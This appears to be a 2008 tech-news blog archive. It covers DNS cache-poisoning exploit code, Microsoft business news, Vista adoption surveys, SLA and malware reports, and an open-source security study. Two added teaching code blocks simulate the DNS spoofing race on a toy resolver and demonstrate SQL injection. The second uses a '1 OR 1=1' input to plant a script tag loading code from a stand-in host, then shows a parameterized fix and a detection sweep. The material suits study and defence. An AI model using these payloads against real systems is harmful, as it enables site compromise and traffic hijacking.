According to the summary of the exploits, the first one lets an attacker plant a forged record for a single host name in a DNS server's cache. The second goes after the name server (NS) record for an entire domain: it rotates through fresh, never-cached query names under that domain until one forged answer is accepted, so a single poisoned entry redirects every host name beneath it. Experts say the latter exploit could result in thousands of fake addresses being served from a DNS server's cache.
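The race those two exploits run, as an added simulation that is neither Moore's modules nor Microsoft's code: a toy resolver accepts a reply only if its transaction ID (TXID) and UDP destination port match the outstanding query, and an attacker floods guesses while a lookup for a fresh name under the target zone is pending. The example assumes what the coordinated patches changed in resolvers, namely drawing a random source port per query instead of reusing one, and it shrinks the ID and port spaces (12-bit TXID, 256 ports) so the loop finishes in milliseconds; the zone name, the attacker's address and the legitimate answer arriving after the flood are all constructed assumptions for the demo.

```python
import random

TXID_BITS = 16      # width of the DNS transaction ID
PORT_RANGE = 64512  # ephemeral ports 1024..65535 (assumed range a patched resolver draws from)


def spoof_success_probability(forged_replies, port_randomized,
                              txid_bits=TXID_BITS, port_range=PORT_RANGE):
    """Chance that at least one of `forged_replies` forged answers, sent while one query
    is outstanding, matches the resolver's TXID and (if randomized) its source port."""
    space = (1 << txid_bits) * (port_range if port_randomized else 1)
    return 1.0 - (1.0 - 1.0 / space) ** forged_replies


def expected_queries_to_poison(forged_replies, port_randomized,
                               txid_bits=TXID_BITS, port_range=PORT_RANGE):
    """Mean number of races (queries) the attacker must trigger before one succeeds."""
    return 1.0 / spoof_success_probability(forged_replies, port_randomized,
                                           txid_bits, port_range)


class ToyResolver:
    """A caching resolver reduced to the one check the attack has to beat: a reply is
    accepted only if its TXID and destination port match the outstanding query."""
    FIXED_PORT = 1025  # an unpatched resolver reuses one ephemeral port for every query

    def __init__(self, rng, port_randomized, txid_bits, port_range):
        self.rng, self.port_randomized = rng, port_randomized
        self.txid_bits, self.port_range = txid_bits, port_range
        self.pending = None
        self.cache = {}  # zone -> address the resolver now believes is its name server

    def send_query(self, qname):
        txid = self.rng.getrandbits(self.txid_bits)
        port = (self.rng.randrange(self.port_range) if self.port_randomized
                else self.FIXED_PORT)
        self.pending = (qname, txid, port)

    def receive(self, qname, txid, port, zone, ns_addr):
        """The forged answer carries an authority/glue record for the whole zone, so one
        accepted packet redirects every name under it (the 'single entry' of the second
        exploit).  Returns True if the reply was accepted."""
        if self.pending == (qname, txid, port):
            self.cache[zone] = ns_addr
            self.pending = None
            return True
        return False


def run_attack(port_randomized, forged_per_query, max_queries, seed=1,
               txid_bits=12, port_range=256):
    """Scaled-down version of the rotating exploit.  Each round asks for a fresh,
    never-cached name under the target zone (so the resolver must query again), then
    floods forged replies.  The legitimate answer is assumed to arrive after the flood.
    Returns the number of rounds until the zone's NS record is poisoned, or None."""
    rng = random.Random(seed)
    resolver = ToyResolver(rng, port_randomized, txid_bits, port_range)
    zone, evil_ns = "example.invalid", "203.0.113.66"  # constructed target and attacker host
    for rounds in range(1, max_queries + 1):
        qname = "%08x.%s" % (rng.getrandbits(32), zone)
        resolver.send_query(qname)
        for _ in range(forged_per_query):
            guess_txid = rng.getrandbits(txid_bits)
            guess_port = (rng.randrange(port_range) if port_randomized
                          else ToyResolver.FIXED_PORT)
            if resolver.receive(qname, guess_txid, guess_port, zone, evil_ns):
                return rounds
    return None


if __name__ == "__main__":
    for randomized in (False, True):
        print("port randomized:", randomized,
              "| P(success per query, 200 forged replies):",
              round(spoof_success_probability(200, randomized, 12, 256), 6),
              "| expected queries:",
              round(expected_queries_to_poison(200, randomized, 12, 256), 1),
              "| simulated rounds to poison:",
              run_attack(randomized, 200, 5000))
```

With the full 16-bit TXID and a fixed port, each forged reply has a 1 in 65,536 chance and the attacker can retry as often as it likes, which is why the exploit works; randomizing the source port multiplies the space the attacker must guess by the size of the port range, turning minutes into weeks.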

In its latest bulletin, Microsoft noted that "attacks are likely imminent" because of the availability of exploit code.

"Since the coordinated release of these updates, the threat to DNS systems has increased due to a greater public understanding of the attacks, as well as detailed exploit code being published on the Internet," the advisory stated.

Reacting to the advisory, IT security pros are saying that Microsoft's statements vindicate the assertions of critics who thought the risk considerations regarding the DNS patch were underplayed.

"While Microsoft admits no active attacks on their radar, and they labeled the patch as 'important,' they are also subtly saying that everyone needs to patch now because the risk is pretty large," said Andrew Storms, director of security for San Francisco-based nCircle, in an interview on Friday.

IT security pros do admit that the DNS discourse and subsequent exploit release spiraled faster and further than Microsoft could have anticipated.

"The magnitude of the big-picture problem is probably more clear now than when Microsoft released the patch, especially now that exploit code is out and has the capability of significant disruption of all DNS-dependent network activity," said Don Leatham, director of solutions and strategy at Lumension Security in Scottsdale, Ariz.

Leatham suggested scrutiny of the fine print in Microsoft's latest DNS security bulletin.

"We've not seen an inordinate number of inquiries on the installation issues. However people should pay special attention to the FAQ for this bulletin, as it has been updated multiple times as issues have been discovered."

While Microsoft touts its DNS vulnerability patch as a safe haven, there are still some issues with actually getting it installed in some Windows programs.

GLSA 200805-17 Perl: Execution of arbitrary code
Word 2002 SP3 Subject to Remote Attacks
Microsoft Advisory Targets SQL Injection Attacks

Ballmer and Liddell Defend Microsoft's Online Spending Plans

Microsoft held its 2008 Financial Analyst Meeting on Thursday, with 10 senior executives attempting to assure the number-crunching crowd on the company's overall financial outlook. The meeting follows Microsoft's 2008 fiscal year-end report, in which revenues hit the $60 billion mark.

During the event, Microsoft's CEO Steve Ballmer filled in for Kevin Johnson, whose departure as head of the Platforms & Services Division was announced on Wednesday, along with a Microsoft division restructuring effort.

Ballmer provided a rationale for all of the spending going on in Microsoft's Online Services Business segment. He said the spending can address a market potentially worth a "trillion dollars."

"That's such a big opportunity that at least at our scale, our size, our market cap, we have to seize and go after those opportunities," Ballmer explained.

He added that Microsoft can build from its present online products (search, Windows Live and MSN) and that Microsoft has already become the 10th largest seller of advertising in the United States. Moreover, search represents a kind of "killer app" and entry point for Microsoft's online strategy. Ballmer dismissed the No. 2 search firm Yahoo, which currently leads Microsoft in search use, saying, "this is a two-horse race: Microsoft against Google."

Ballmer suggested just how much Microsoft may be willing to spend to contest Google in the search-ad space. He said that "Google spends about $2.5 billion and growing on R&D." In response, Microsoft might consider a range of "at least $1.2 billion or $1.5 billion a year to stay competitive."

Ballmer also gave a bow to Apple's recent inroads into the Windows-based PC market share. He said that Microsoft planned to offer products that offer "every choice that you can get on a Mac or other machine."

Chris Liddell, Microsoft's chief financial officer, assured the crowd that Microsoft's core business revenues have been flat over a five-year period, showing a 61 percent margin in fiscal-year 2008, which Liddell called "a tremendous performance." In contrast, the loss for Microsoft's Online Services Business segment, which drives Microsoft's search and online strategies, was 38 percent in fiscal-year 2008.

Liddell said that figure will "not always be negative" and that the Online Business Services spending is part of the company's efforts to generate future revenues.

The potential Yahoo acquisition, which was publicly proposed in January but technically called off in April, would have accelerated Microsoft's strategy in the online search-advertising space. However, Liddell claimed that the value of that deal had declined over time after Yahoo spurned Microsoft's unsolicited bid.

"We took the view, and still take the view, that Yahoo is a declining asset," Liddell said. He added that it is ironic now that Yahoo is willing to sell to Microsoft at the price Microsoft originally offered. He didn't rule out the possibility that Microsoft might still strike a deal to buy Yahoo's search-ad business.

Microsoft Revamps Its Platforms Division, Loses Kevin Johnson
Google search share climbs

Enterprise Adoption of Vista at 'Single Digits,' Report Says

The Windows Vista operating system has been "rejected," or is not widely adopted in the enterprise segment, according to a Forrester Research report released on Wednesday that describes enterprise software adoption trends for the desktop.

The study surveyed large enterprises throughout the first half of 2008. It found Vista adoption in the enterprise to be 8.8 percent in June, up from 6.2 percent at the beginning of the year.

The report, "Enterprise Trends: Vista Is Rejected; Mozilla and Apple Make Small Gains," was written with the aim of giving software vendors an idea on what to expect as they develop their products for desktop use.

By no means is Windows out of the picture, especially with wide use of Microsoft's legacy Windows XP operating system in the enterprise. The report recommends that vendors "develop exclusively for Windows XP and Vista," which account for the vast majority of operating systems used.

In addition, the authors recommend that software vendors "forget about Macs" unless they are developing solutions for specific enterprise markets that utilize Macintosh computers.

Linux desktop use in the enterprise was negligible, at less than one percent, according to the report.

For its part, Microsoft estimates that it has sold 180 million Vista licenses, as reported during its 2008 Financial Analyst Meeting, held on July 24. That 180-million figure is "very balanced across both consumer and enterprise," according to Bill Veghte, senior vice president of Microsoft's Online Services & Windows Business Group, who spoke at the event.

Veghte added that the adoption of Vista accelerated in the enterprise after Service Pack 1 was released. Microsoft released Vista SP1 to manufacturers in February of this year.

"You saw those enterprises accelerating that deployment," said Veghte to the financial analyst crowd, referring to Vista SP1. "And as one of you wrote on recently, we're seeing that track very consistently with the deployment cycle we saw in enterprises around XP."

The authors of Forrester's report had a different view.

"Eighteen months after the release of Windows Vista, enterprise adoption is still in the single digits, and the majority of that seems to have come from upgrades of legacy Windows versions, not XP," it stated.

The report added that Vista adoption in the enterprise "appears falling short of planned deployment," based on the group's previous research.

In any case, many developers seem to have caught up with making their applications compatible with Vista since its initial release. Veghte said at the Financial Analyst Meeting that more than 250 commercial applications are now compatible with Vista.

Forrester's enterprise desktop Windows OS adoption numbers appear to track well with data collected by KACE, a maker of a systems management appliance that lets users share OS use information. An informal KACE poll found that 85 percent of its enterprise respondents used Windows XP.

Forrester's study polled "more than 50,000 users at more than 2,300 large to very large enterprises." It also examined browser use, Java and Flash adoption and matters such as screen resolution and color depth. The report can be accessed here.

Survey: Vista Adoption Weakens, as IT Pros Eye Apple
Forrester: Vista rejected like ‘new Coke’ by enterprises
The Perfect Desktop - OpenSUSE 11 (GNOME)

Friday, July 25, 2008

The Gold-Laying UC Egg

You've probably heard Cisco Systems Inc., Microsoft Corp., and others making a lot of noise, recently, about unified communications (UC).

There's a reason for that, experts say: There are profits to be had in UC. The market itself grew by 20 percent in both 2007 and 2006, according to market-watcher Infonetics Research.

On a related note, the IP contact center (IPCC) segment also surged in both years, growing by an average of 25 percent in 2006 and 2007. Predictable expansion of this kind is a gold-laying goose that Cisco, Microsoft and others just can't ignore.

What's more, according to Infonetics, UC and IPCC sales eclipsed the $1.05 billion mark in 2007, with "healthy growth" projected through at least 2011.

"As a key component of unified communications, sales of communicator software clients are taking off. The Nortel/Microsoft alliance drove growth in 2007, and Microsoft captured close to half the communicator market," said Matthias Machowinski, Infonetics Research's directing analyst for enterprise voice and data, in a statement. "Market share will likely bounce around in the coming years, as vendors from different backgrounds try to establish themselves as the leader in the nascent UC market and promote their offerings aggressively."

Infonetics' research paints a picture of a UC and IPCC free-for-all. Microsoft, for example, recently unveiled its own UC entries -- and promptly catapulted to first place in communicator revenue market share last year.

Unified messaging, meanwhile, is a more stolid segment: It accounts for the bulk of the entire UC market and, at this point, it's led by Avaya, which accounts for about one-third of unified messaging revenues.

Avaya is flat-out dominant in the IPCC market, where it accounts for more than half of worldwide revenues, according to Infonetics; Cisco is second in this segment, the market watcher said.

PSN hits one million accounts in Japan
Unisys Offers Free Unified Communications Trial

Service Level Agreements Too IT-Centric, Forrester Report Warns

Service level agreements (SLAs) are a popular tool for measuring how well IT is providing service to its customers, the organization's business users.

A new Forrester Consulting report based on a survey of 389 global technology decision-makers who work with service management finds serious deficiencies with current SLAs. The study sheds light on how SLAs are currently being used, the degree of end-user dissatisfaction, and what IT can do to correct the problem.

At the heart of the matter is the IT-centric nature of the service level metrics, most of which have little or no relevance to business end users.

[T]here is one important question that IT executives should consider in these projects: Whose services are we talking about? Do people -- especially colleagues on the business side -- really care about how well IT performs their IT processes, such as fixing incidents, making configuration changes, and provisioning server environments? Isn't it much more relevant to discuss and measure the performance of the services that the business cares about -- such as processing orders, dealing with customers, and making and shipping products?

The report, Managing IT Services From The Outside In, commissioned by Compuware Corporation, explores the effectiveness of an organization's processes as well as what technologies they use. The survey asked about service management processes, how content for service-level agreements is developed, and how service quality is measured.

Although 81 percent of respondents are involved with formal SLAs, they meet those expectations only three quarters (74 percent) of the time. "The major reason cited for failure to meet the agreed-upon service levels was that 'The business had higher expectations than we could meet.'" Forrester says this is a "clear demonstration of poor business and IT alignment."

The majority of respondents use IT-centric metrics (including network and server availability, number of incidents, and number of failed transactions). Of the 321 respondents using SLAs, 56 percent establish a fresh metrics baseline and 33 percent use the previous year's performance as a guide. The baseline often involves only IT personnel.

Business users understand that these measures may be needed by IT, but Forrester points out that systems and networks are "extremely reliable" and "managing the applications portfolio is becoming increasingly complex with end users, inside and outside the enterprise, [as is] running their apps on different devices and over different networks."

Communication Is Key
Communication and coordination between IT and business users are two areas Forrester says IT must examine; 41 percent of the respondents don't even "collect the right service quality data together for their IT and business executives, so they do not even attempt to provide these reports at all," the report notes.

Poor communications may also explain why SLAs may not be "agreements" at all.

They are not negotiated with the business partner because there is no dialogue process and because the business does not understand terms like "percentage availability" or "amount of storage." So when reviewing the IT service at the end of a budget period, business managers can say, "It was not good enough for me to do my business," even if the IT service levels were met on a mathematical basis from the IT point of view.

Forrester reports that the focus of metrics will move from IT to the business as communication increases between the two groups.

The survey found that although 87 percent of the respondents said they use tools to monitor the end-user experience (EUE) for some of their business-critical apps, nearly two-thirds (64 percent) acknowledge that they learn about problems only when users contact the help desk.

There's no question about the impact of poor application performance: 57 percent say it increases business costs. Lost revenue and negative impacts to the satisfaction of external customers were each cited by 48 percent. Even so, not all organizations are using SLAs or believe they're needed at all. The study reports that 17 percent of respondents don't have formal SLAs, and half of these acknowledge the need but have not instituted a formal SLA program, and 37 percent of these respondents said "the business hadn't asked for SLAs." Nearly a quarter (24 percent) said SLAs were "overkill."

Two movements are affecting IT, according to Forrester. IT service management (ITSM) "supports the change of an IT organization from a support group into a service group." ITSM includes introducing ITIL or reorganizing IT operations into process groups (instead of tech silos), as well as "the introduction of account management, and even marketing concepts within the IT organization." ITSM is inward-looking and only indicates "how well the IT shop is being run." It does not address the need to know how the business is being run from the perspective of the business unit and the end user.

Business Service Management (BSM) looks at a different set of metrics, including the business transaction volume, transaction speed, and the processing backlog volume.

Report Recommendations
IT operations must establish business-centric SLA metrics, and to do that, IT must "understand their services from the outside in." Forrester recommends IT:

...spend time with business users and understand how they, the users, perceive the service and document what is important for business success or failure. Companies in this phase of service management usually focus on the quality of service around business applications. They need to analyze and document the dependencies between business applications and the details of IT infrastructure in order to better triage incidents or understand true business impact of pending performance or capacity issues.

Communication is key. The report also claims that many SLA reports lack information relevant to executives; 40 percent of survey respondents agreed. Forty-one percent of respondents said they don't provide regular reports to executives.

The report also strongly suggests that leveraging ITIL best practices should be the first methodology chosen because it specifically addresses IT processes. "ITIL is best for documenting and standardizing the IT processes themselves." It notes that quality-improvements programs (including Six Sigma) can help IT improve its processes. Together, the two methodologies provide "a powerful combination for continual IT service improvement."

Failure by IT to change its approach to SLAs may have serious consequences. The study notes that "IT organizations that consider their service management projects only at the IT service level will continue to disappoint their business users in the longer term, and the age-old CIO problem of being equipped to demonstrate value to the business will prevail."

iPhone multimedia lead advances, research claims
IT Cost Cuts in 2008 May Be a Trend, Study Says
80% of businesses have at least one Mac
Survey: Vista Adoption Weakens, as IT Pros Eye Apple

Most Malware Found on Trusted Web Pages, Report Says

Five seconds into reading this story, a Web page somewhere will become infected with malware or some other malicious code. That's one of the conclusions of U.K.-based IT security firm Sophos in an IT security report released on Wednesday.

"We found that there is an average of 16,173 infected Web pages on a daily basis," said Sophos' Senior Technology Consultant Graham Cluley in a phone interview from his office in London. "We arrived at this conclusion from our labs around the world. We look at millions of e-mails and Web page transmissions on a daily basis and it averages out to one infected page every five seconds."

The threat report covers the first six months of this year and according to Cluley and the report itself, the page infections are occurring at a rate three times faster than the comparable period in 2007.

The report identified the Windows OS as the largest target for malware. It also found that 90 percent of infected Web pages derived from trusted sites such as Facebook and LinkedIn, as well as other oft-visited destinations.

The report pegged the do-it-yourself blogging portal as the top host for malware on the World Wide Web, with an estimated two percent of the malicious software being incubated and launched on that site alone. The study also mentioned the astronomical rise of spam on mobile devices in places such as China, where such junk mail messages grew to almost 354 billion in 2007.

The one major security theme in the report was the recent rise in SQL injection attacks, which exploit application code that splices untrusted input into the queries it sends to a back-end database. A successful injection lets an attacker read or rewrite data fields directly and, depending on the privileges of the database account the application uses, gain a foothold from which to escalate further on the network.

"What we've seen with these attacks is that even if you clean up the database and get rid of the virus there, it could either be just a decoy for another injection attack or another virus will come along soon," Cluley said.
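The pattern behind both of those points, as an added example that is not from the Sophos report or any site it names: a single injectable UPDATE lets one request rewrite a data field in every row of a table (this is how script tags end up on every page of a compromised shop), the parameterized version closes the hole, and a sweep over the stored data finds the rows that were hit. Because the injection is in the application, cleaning the table without fixing the query only invites the next round, which is Cluley's point above. The catalogue table, its rows and the script URL are constructed for the demo; SQLite stands in for whatever database the application really uses.

```python
import re
import sqlite3

# Constructed sample catalogue; any resemblance to a real shop is accidental.
SAMPLE_ROWS = [
    (1, "Widget", "A plain widget."),
    (2, "Gadget", "A gadget with two buttons."),
    (3, "Gizmo", "Limited edition gizmo."),
]
# Hypothetical payload: the tag the attacker wants every product page to render.
INJECTED_TAG = '<script src="http://example.invalid/x.js"></script>'
SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def make_db():
    """In-memory SQLite database with the sample catalogue loaded."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def update_description_vulnerable(conn, product_id, text):
    """The bug: both values are spliced into the SQL text.  product_id comes from a
    hidden form field, so '1 OR 1=1' is accepted as-is and the WHERE clause matches
    every row.  Returns the number of rows rewritten."""
    sql = "UPDATE products SET description = '%s' WHERE id = %s" % (text, product_id)
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def update_description_safe(conn, product_id, text):
    """The fix: check the identifier's type, then let the driver bind both values as
    parameters so neither can be parsed as SQL.  Raises ValueError for '1 OR 1=1'."""
    pid = int(product_id)
    cur = conn.execute("UPDATE products SET description = ? WHERE id = ?", (text, pid))
    conn.commit()
    return cur.rowcount


def find_injected_rows(conn):
    """Clean-up sweep: ids of rows whose description now carries a script tag."""
    rows = conn.execute("SELECT id, description FROM products ORDER BY id").fetchall()
    return [pid for pid, desc in rows if SCRIPT_TAG.search(desc or "")]


def descriptions(conn):
    """All descriptions in id order, for inspecting what a call changed."""
    return [d for (d,) in conn.execute("SELECT description FROM products ORDER BY id")]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, rows rewritten by one request:",
          update_description_vulnerable(db, "1 OR 1=1", INJECTED_TAG))
    print("rows carrying a script tag:", find_injected_rows(db))
    db = make_db()
    try:
        update_description_safe(db, "1 OR 1=1", INJECTED_TAG)
    except ValueError as err:
        print("safe version rejected the id:", err)
    print("safe update of one row:", update_description_safe(db, "2", "Now it's blue."))
    print(descriptions(db))
```

The sweep is only as good as its pattern; the real clean-up is the second function, since the stored tag is the symptom and the string-built query is the cause.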

At risk are traditional brick-and-mortar companies that have decided to foster an increased presence on the Web. Their e-commerce platforms could be vulnerable to manipulation by hackers, the report stresses. In addition to applying security patches, some enterprises should have a "security lock box" or Web appliance as a buffer between the end user and the enterprises' infrastructure.

The lessons particularly apply to small and mid-size companies.

"Hackers have by and large stopped using e-mail as an entry point and instead decided to frame their attacks in and around the Web browser," Cluley further warned. "Big companies may have the infrastructure and the money to act, but the real necessity here is for small and medium sized businesses to reassess Internet security. This is clearly an opportunity for channel partners as well as enterprises themselves to collaborate and get involved, whether it's a consultant for the business or an internal mandate."

Increasing Number Of U.S. Residents Delay, Forgo Needed Health Care Because Of Cost Concerns, According To Report
Microsoft Advisory Targets SQL Injection Attacks
PC Tools launch iAntiVirus beta
Government, Health Care Web Sites Attacked

Thursday, July 24, 2008

Microsoft Revamps Its Platforms Division, Loses Kevin Johnson

Microsoft on late Wednesday announced a reorganization of its Platforms & Services Division (PSD), as well as the departure of Kevin Johnson, a 16-year Microsoft veteran and president of the PSD.

The company plans to split the PSD into two groups: "Windows/Windows Live" and "Online Services." Those groups will report to Microsoft's CEO Steve Ballmer, according to an announcement issued by the company. Ballmer has appointed Senior Vice Presidents Jon DeVaan, Steven Sinofsky and Bill Veghte to lead the Windows/Windows Live group, "effective immediately."

Microsoft also plans to establish "a new senior lead position" in the Online Services Division and is currently searching for a candidate for the job.

Johnson will be leaving to become the CEO of Juniper Networks, according to the Wall Street Journal.

Johnson had overseen Microsoft's Windows and Online Services businesses, the latter of which centered on Live Search, and Windows Live. He also had been involved in the company's overall strategy, reporting to Ballmer.

In early June, Johnson declared he would fix the rebranding of Microsoft's Live Search, with the aim of increasing Microsoft's competition with No. 1 online search player Google. That renewed focus on Microsoft's "organic" search development came after an unsolicited bid to acquire No. 2 Internet search firm Yahoo failed to materialize in April.

Johnson was also involved with Microsoft's software plus services strategy, in which he oversaw 30 acquisitions. The biggest of those was a $6 billion acquisition of aQuantive Inc., boosting Microsoft's digital advertising technologies.

Johnson also had a hand in overseeing the Windows Vista operating system launch, in which more than 180 million copies have been sold, according to Microsoft's fiscal fourth-quarter report, released on July 17.

Microsoft's 4Q report showed that its Online Services Division had a $1.23 billion operating loss for the fiscal year, which was largely associated with its competitive efforts to catch up with Google in online search advertising business.

Microsoft has defended its expenditures in search, with Chris Liddell, Microsoft's senior vice president and chief financial officer, saying the expenditures are necessary to address a market "measured in the tens of billions of dollars."

Google search share climbs
Yang, Ballmer Go Golfing; Merger No Longer a Priority
Live Mesh Preview: It’s Wait-List Only

Companies Ditch ATM, Frame Relay -- Finally

Out with the old (frame relay, ATM and subscriber lines) and in with the new (e.g., Ethernet or IP MPLS VPN services). That's the latest trend in enterprise networking, according to market watcher Infonetics Research.

The upshot, Infonetics said, is that after years of talking about eighty-sixing their legacy frame relay assets, organizations are finally doing it.

Worldwide Ethernet service revenues grew by fully one-third (33 percent) to $12.5 billion last year, while IP MPLS VPN revenues increased by one-fifth (20 percent), reaching $13 billion. That's just the beginning, according to Infonetics, which projected strong growth through 2011.

"Customer demand and IP and next-gen network...transformation projects are the two main factors contributing to the growing popularity of Ethernet and IP MPLS VPN services," said Michael Howard, Infonetics principal analyst, in a statement. "Companies like these services because they offer considerably more bandwidth with little or no increased WAN costs compared to their legacy counterparts" like frame relay, ATM, or private lines.

"Customers expect -- and get -- a better per-bit cost for Ethernet services. And service providers like them because they help bring in new revenue, so requests for Ethernet and IP MPLS VPN services are coming from both sides."

Not surprisingly, Ethernet's value proposition is hard to beat. Prices vary considerably, Infonetics conceded, but -- in North America, at least -- 100M Ethernet clocks in at about $50 per Mbps, while DS3 or SONET costs more than three times as much ($180 per Mbps).

Last year, 80 percent of Ethernet service revenues stemmed from retail sales, according to Infonetics, a trend that will continue through 2011: All sources of retail Ethernet service revenue -- including Internet/WAN, Ethernet private line and transparent LAN -- will increase. Over the same period, Infonetics predicted, transparent LAN services will notch the fastest overall growth.

Apple posts regional, product sales figures for Q3
Cloud Computing To Bring Security App Shift, Report Says

Survey: Vista Adoption Weakens, as IT Pros Eye Apple

A KACE-sponsored survey on Windows Vista adoption represents more bad news for Microsoft's flagship operating system, even as Microsoft prepares to pour an estimated $300 million into a new Vista marketing campaign -- news that was announced at Microsoft's 2008 Worldwide Partner Conference.

The survey polled 1,162 IT professionals in June and was conducted by King Research for KACE, which makes a hardware-based systems management product for IT administrators. The company's KBOX product is also available as a plug-in to VMware's virtualized stack.

This latest survey represents a second go-round for KACE, which sponsored an initial survey published in November of 2007. The 2008 survey used the same database source as the survey conducted last year, as well as many of the same questions.

This survey found a slip in Windows Vista deployment plans, with 60 percent of respondents saying that they had "no plans to deploy Vista at this time," compared with 53 percent in the 2007 survey.

The respondents also appeared to reject the "common wisdom" that people were simply waiting for Service Pack 1 to deploy Vista, with the idea that initial bugs and incompatibilities would be worked out by then. A solid 92 percent of survey respondents said that "Vista Service Pack 1 has not changed their plans for Vista deployment."

Concerns about deploying Vista, pegged at 90 percent in the 2007 survey, dropped to 82 percent in this survey. However, the apparent increased confidence in Vista wasn't matched by deployment trends as 47 percent of respondents said they had "not deployed Vista in any way" compared with 48 percent in last year's survey.

"Windows 7," the code name for Microsoft's newest OS, expected to appear in the 2009 to 2010 time frame, hadn't affected the majority (51 percent) of the respondents' deployment plans. However, 14 percent of respondents planned to skip Vista for Windows 7, while another 14 percent had decided to delay their Vista deployment plans while considering additional details about Windows 7.

Some respondents (42 percent) said they were considering alternative operating systems to Windows Vista. The Macintosh operating system was the favored alternative by 29 percent of respondents. Linux-based operating systems were also in the running, but trailed. More IT professionals reported challenges managing non-Windows operating systems in this survey, with 65 percent citing a need for expertise vs. 49 percent in 2007.

Despite those troubles, Rob Meinhardt, cofounder and CEO of KACE, believes that IT is moving more toward managing a heterogeneous desktop environment, even to the point of giving employees their choice of computer to use.

"I don't think in the future you are going to see homogeneity on the Windows front anymore," Meinhardt said. "You are going to see people running XP side-by-side with Vista. Now that's also true of cross-platform to non-Windows platforms. You are going to see more companies running Windows Vista, Windows 7, Windows XP side-by-side with Macintosh."

KACE is a case in point, since about 50 percent of its computers are Macs, Meinhardt explained. KACE's "bias" in sponsoring the survey is that it advocates the use of its KBOX product to help IT administrators manage such heterogeneous environments. The product competes with Microsoft's Systems Management Server, which can only handle Windows environments, according to Meinhardt.

The survey results are one thing, but KACE also has an alternative method for estimating OS adoption. KACE customers can opt-in to a survey through the company's KBOX management product and share what operating systems they use. Meinhardt says that option has created "several hundred thousands of data points" on OS use.

"At the very high level, XP represents 85 percent of that pool," he said of this alternative KACE poll. "Vista is at about one percent, and Macintosh is at about four percent." Meinhardt concluded that "there is relatively low Vista adoption in the enterprise and indeed Apple is actually ahead of Vista in these businesses."

Those interested in seeing the full results of KACE's June 2008 survey can get a free copy (PDF) here.


Wednesday, July 23, 2008

IT Cost Cuts in 2008 May Be a Trend, Study Says

A first-quarter 2008 survey conducted by Computer Economics suggests a possible slowdown in IT spending and staffing lies ahead.

The group's analysis found that the growth rate in the median IT operational budget was four percent among its 2008 survey participants. That figure represents a decline from the five percent growth rate measured in 2007.

The four percent increase in IT budgets for this year "may prove to be optimistic," according to the report, because one in four IT executives say they don't plan to spend all of the money in their budgets.

The top priority for IT organizations in 2008 was "to improve IT service levels." In contrast, the 2007 response was "developing new systems." The report interprets this shift to indicate "a general softening in the focus on new systems and tighter attention on cost control."

The other top priorities for IT organizations in 2008 included risk management and disaster recovery, security, and lowering IT maintenance and support costs.

The report, "IT Spending, Staffing & Technology Trends 2008/2009," said it found indications of "a decidedly cautious mood among our survey respondents this year, in contrast to the optimistic tone in last year's survey."

IT spending per user was $6,667, representing a decline from $7,397 in 2007. The report's analysis suggests that this decrease in spending means that IT management is finding a way to get along with less.

"In other words, in today's weak economic conditions, IT managers are showing their ability to support an increasing number of users without corresponding increases in IT spending," the report states.

In terms of long-term capital IT spending, the report sees a pullback. The median IT capital spending for 2008 was flat, whereas it grew at a four percent rate in 2007.

Does all of this mean less hiring or layoffs? The report found that prospect to be a mixed bag, with 39 percent of respondents saying they are adding staff, 37 percent indicating no change in staffing and 24 percent planning to cut staff. However, outsourcing is on the rise among companies of all sizes, the report indicates. Respondents in organizations that have outsourced their software development work say they plan to increase outsourcing by 15 percent.

Computer Economics' survey was conducted from January to April, 2008. Respondents were IT staff knowledgeable about spending and staffing in the United States and Canada. Participants included "201 CIOs and senior IT management" in large, medium and small companies.

For access to the report or a free executive summary, go here.


Open Source Needs Better Security Focus, Study Says

The open source software community lags behind the commercial software sector in secure code development, according to a recent study of some commonly used open source packages.

Fortify Software Inc., of San Mateo, Calif., examined 16 applications and found that vulnerabilities often were not fixed in new releases and, in some cases, the number of vulnerabilities actually increased.

In examining the organizations maintaining the applications, the study found a lack of dedicated security experts and secure coding standards, and a focus on functionality rather than security and risk mitigation.

The issues are significant because enterprises are increasingly adopting open source software. Users could be exposed to unnecessary security risks if they are not closely examining the code in their applications, the study warned. Fortify conducted the study because of the number of its banking-industry clients who were reviewing and, in many cases, rebuilding open source applications.

"Government and commercial organizations that leverage open source should follow the example of the financial services industry and use open source applications with great caution," the study stated.

It also recommended that open source communities adopt the robust security practices many of their commercial counterparts now use.

Although far from perfect, "in general, the commercial side is slightly ahead" in secure software development, said Rob Rachwald, Fortify's director of product marketing.

Open source software has a more transparent development process in which source code is available to users, who can examine, use and modify it as they wish. The process seeks to produce more functional, adaptive applications without hidden features and allows a broad community to identify flaws. But many vulnerabilities go unrecognized or, if recognized, go unfixed over several generations of software.

"Only one of the packages surveyed showed a net decline in vulnerabilities over three generations of releases," the study stated.

Fortify used its static code analysis tool to examine two to four versions of each Java-based open source application. Analysts manually verified any major security issues the tool discovered.

The applications studied were:

Cayenne, an object-relational mapping tool.
Hibernate, an object-relational mapping tool.
Derby, an application server.
Geronimo, an application server.
Hipergate, a Web-based customer relationship management application.
JBoss, an application server.
Jonas, an application server.
Jbopen source, an application server.
Ofbiz, a Web-based CRM application.
OpenJMS, a Java Message Service solution.
OpenCMS, a content management tool.
Resin, an application server.
Shale, a JSF Web framework.
Struts, a Web application.
Tomcat, a servlet engine.
Webharvest, a Web crawler.

The study found a total of 44,233 vulnerabilities in the 4.25 million lines of code examined. Hipergate 3.0.26 topped the list with 14,425 vulnerabilities in about 81,000 lines of code. The two most common vulnerabilities overall were cross-site scripting, with 22,828, and SQL injection, with 15,612.

Fortify made details of the vulnerabilities available to the applications' development teams but did not include them in the public report.

The company recommended that security be integrated into the development process, with someone assigned that role. So far, that approach is the exception rather than the rule.

"We see promising signs," the study stated. "In July 2008, Mozilla announced a security initiative to improve the browser's security, hiring independent security consultant Rich Mogull as an adviser."

The report recommended that other teams follow Mozilla's lead.


DNS Flaw Unfixed as Experts Argue Protocol

Speculation continues as to what the ultimate systemic Domain Name System (DNS) flaw could be. This flaw apparently allows Web surfers to be spoofed, directing them to fake Web sites to gain passwords and load malware on their computers.

The flaw was first revealed by Dan Kaminsky, a researcher at security firm IOActive Inc., although Kaminsky largely withheld the technical details of the exploit.

